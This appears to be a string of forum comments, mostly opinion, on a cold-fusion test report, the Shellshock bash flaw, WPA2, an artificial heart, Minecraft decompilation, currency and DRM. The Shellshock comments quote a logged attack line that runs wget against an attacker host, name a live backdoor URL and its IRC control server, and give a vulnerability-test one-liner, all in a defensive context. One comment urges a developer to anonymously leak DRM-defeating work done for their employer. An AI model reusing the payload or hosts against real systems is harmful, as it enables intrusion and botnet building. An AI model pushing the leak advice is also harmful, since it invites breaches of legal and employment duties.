Read the report (specifically page 8 and annex 2) - they actually analyzed the device's coating material. It was made of Al2O3 (and this was taken into account in the calorimetry), with no obvious other compounds.

While there are possible calorimetry issues here, it's hard to see an obvious one that would explain such a large measurement error; alumina IR transparency has been considered, as well as IR calibration issues (especially given the imperfect dummy test); both do not appear to be valid critics (see my comment here for details).

Given the extraordinary claims, extraordinary evidence is obviously required here; and this report definitely isn't that. Its experimental protocol and the results obtained are however more than enough to warrant further investigation; which may be hard given that this isn't like a "classical" experiment, that can be easily replicated - you basically need Rossi/Industrial Heat (the company that acquired Rossi's device and tech) to provide you with his black box and stay the hell away from the test (this is the first time he actually did that; and even here he couldn't help himself being present for the initial "fuel" insertion and the ash extraction at the end of the experiment - which render the isotopic changes inevitably suspicious).

Nope, that was true in the first test, not this one. None of the instruments came or were set up by Rossi. This test didn't occur in his lab, but in a neutral lab with controlled access. He was however present for the loading of the initial "fuel" and the extraction of the ash at the end of the test (which was stupid, and suspicious - especially given the witnessed isotopic changes in the ash).

Even assuming he did some swap on the ash itself, though, it does not explain the witnessed extra heat output (which even with extremely conservative estimates in the paper sets a CoP at ~3.6).
Now, their calorimetry is far from perfect - there were initial concerns about alumina (the device's main material) transparency to IR, for example; those have been put to rest given the fact that the IR camera used works above 7um wavelengths and at those ranges, transparency isn't an issue. Another concern (stressed by other people above) is the whole way the IR camera itself was calibrated and set-up - however, the IR cam was a new, never before used one, and they simply tested its calibration. Even if the measures are off due to the bad calorimetry, there is no obvious way it could translate into an error of that magnitude without some other obvious signs of it (like crazy differences between the hotter "segments" of the device and others, colder ones). And once again, they made all of their calculation using very conservative estimates and taking into account all margins of error.

As for the researchers themselves, they are far from disreputable (except maybe for Levi in this specific context); they are engaging their reputation by publishing this and one of them, Hanno Essen, is also the head of the Swedish Skeptics Society and has at least some experience in dealing with crackpots and suspicious "revolutionary" inventions.

This does warrant further research; beyond ad hominem attacks on Rossi, I haven't seen any strong critic of the experimental protocol that hasn't been quickly debunked (except for the transmutation thing; that could be explained by Rossi doing some sort of swap. It should be noted that he was watched at all time by several people though).

My bad - indeed it is.

No - there actually need to be a bash CGI script for it to work; as long as you have only 404 codes you are fine.

It's not the only botnet being constructed, see my comment here - already 653 exploited servers there right now.
This is quite bad - as long as a bash CGI script is found by probing, exploiting only require putting a bash command in a header such as "Cookie:" for it to be executed. And this is only through HTTP - there are also aready other proof of concepts exploiting this through other bash-using services (DHCP servers for example).
You can check if you've been scanned for exploitable CGIs using something like (adjust apache logs path accordingly):

grep cgi /var/log/apache2/access*|egrep "};|}\s*;"

And you can check if your bash is vulnerable using:

env x='() { :;}; echo vulnerable' bash -c 'echo Testing...'

If 'vulnerable' appears, it is.

Another one attempts to download and execute h t t p ://213.5.67.223/jurat , a perl backdoor that'll connect to a control IRC server (46.16.170.158 port 443), presumably so that a botnet can be constructed. It allows for port scanning and DDOSing remote targets based on IRC commands received.

And right now, there are already 560 invisible users connected there... and it grows at quite a pace. The flaw is definitely being exploited in the wild.

Just saw this in the server logs on one of our servers:

82.165.144.187 - - [25/Sep/2014:18:55:59 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 392 "-" "() { :; }; /usr/bin/wget 82.165.144.187/bbbbbbbbbbbb"

An attempt at exploiting the vulnerability (trying to wget h t t p : // 82.165.144.187/bbbbbbbbbbbb to confirm the system is vulnerable).

The only thing that link proves is that WPA2-PSK is secure as long as you choose a long enough password.

Of course you can capture a handshake and try and bruteforce the password. But as long as said password is long enough, and even with GPU-assisted cracking, you'll die before you even go through a thousandth of the possibility space.
Security doesn't have to be perfect - if it turns out eventually that hardware advances or a flaw in the implementation makes an attack even remotely feasible, then you'll surely be able to update the heart's firmware or even, worst case scenario, to replace it. For the time being, it's good enough. And even if an attack is possible (jamming seems certainly possible, for example, and would prevent adjusting the heart rate for the duration), the device should never obey any command that may put the user at risk - IE, never go below a certain rate.

Meanwhile, the people this device is implanted in wouldn't even be alive without it. And shit, we're talking about a completely artificial heart, currently being implanted in humans, the first one of which allowed its wearer to last for 76 days (an impressive success by all accounts). This is the stuff of science fiction. The WIFI aspect hardly seems relevant compared to this - and yet 90% of the comments seem to focus on that. How depressing.

If the source code in question has been obtained by decompilation, is it really the "original" Minecraft source code (the one that is covered by the original license) ? I mean, you're basically looking at a non human-readable binary, freely distributed, and deducing a source code that would produce the same binary. At this point the resulting source code is your work IMHO.

Then again, things may seem a little different here since it's Java and I think using "decompilation" on the byte code produces code that is likely to be extremely close to the original. But it doesn't really seem that different.

At any rate, this specific case seems a lot more straightforward since if I understand correctly the bukkit guys sold their project without getting permission from all their contributors - the fact that the bukkit people used decompiled Java bytecode appears to have little relevance to the case itself.

They didn't - they were 'simple' water collectors (such as, I think, already exist), providing a small amount of clean water at dawn but not generating any energy in the process.
This tech, however, would be a nice one to power the Fremen's stillsuits in the same universe - providing additional water from the atmosphere while at the same time powering the various pumps and recycling tech inside of the suit :-) though if I remember correctly Herbert described those as powered by the movements of the user.

It's only a diff of the new fishy 7.2 changes. You can grab the source on the archlinux FTP though.
Presumably the guys in charge of the public crowd-funded audit could also provide a version of the source that would be deemed "trusted" by most people (and those that have already downloaded the source previously can offer confirmation).

What's the value all of the US's cities ? all the buildings, the infrastructure, the work of arts, the land itself (and its capacity to provide food, minerals and resources in general) ? for that matter, what's the value of the people in the US - builders, farmers, doctors, scientists ?

This is what the currency is backed by: the value of the country itself. The US government represent all the people in the US and all those valuable things - land, buildings, etc.... It emits currency and pays with it; that says to the people accepting the currency: yes, we represent all those valuable things, and worst case scenario if we cannot pay you back then we have collaterals - you can take a bit of land instead, or our scientists will work on your project for N years, etc... and it will sure help you more than some gold.

It's not perfect but it sure seems to me that it makes more sense than backing the currency with big lumps of yellow metal with relatively limited uses.

I'm not - why should we settle for small steps, when we already have the capability to make giant ones ? where would we be right now as a species if even half the money spent in DRM schemes/IP protection stuff had been thrown in global network deployment (there are still large parts of the planet's population with no access to the Internet, or even no electricity) and putting online courses/teaching material/culture online ?

While the rest of your post seems pretty reasonable and possibly less utopic/optimistic than mine, this I strongly doubt. It seems to me that the very resources inequalities we're seeing currently - the very fact that some people posess thousands times more money/power than most - is a major part of such an artificially enforced scarcity. It's just concentration of power, and people in power wanting to keep that power.

Maybe I'm just too young / not cynical (call it realistic if you will) enough; that being said, once again, having the capability to diffuse culture massively and willingly limiting that capability seems like a form of madness to me. Makes you wonder what'll happen when material, real-life scarcity will no longer be an issue (and I personally think we're not that far of).

Then leave. Find a job elsewhere. Or even better: spend some of your free time writing and publishing (anonymously, of course - use tor) DRM-defeating software based on what you implemented at work - you already have the tech details since you implemented the DRM stuff (or just publish the tech details anonymously and let others implement the stuff). They can't continue playing this kind of games if no developer are helping them.

And I don't think doing so would stop the release or funding of entertainment stuff, either (be it games, movies or music); people have been making music & art for thousand of years without that kind of shit, and people are genuinely ready to pay for content if it's quality, easily available, and reasonably priced; even if it's available elsewhere for free. They are also ready to pay to finance that kind of development even when a release is not certain (look at the many successful crowdfunded projects). It would certainly decrease the amount of shitty games/movies created, though.

The very fact that we have the technological capability to massively distribute culture at a very low cost and we don't because of greed/artificially enforced scarcity is truly depressing.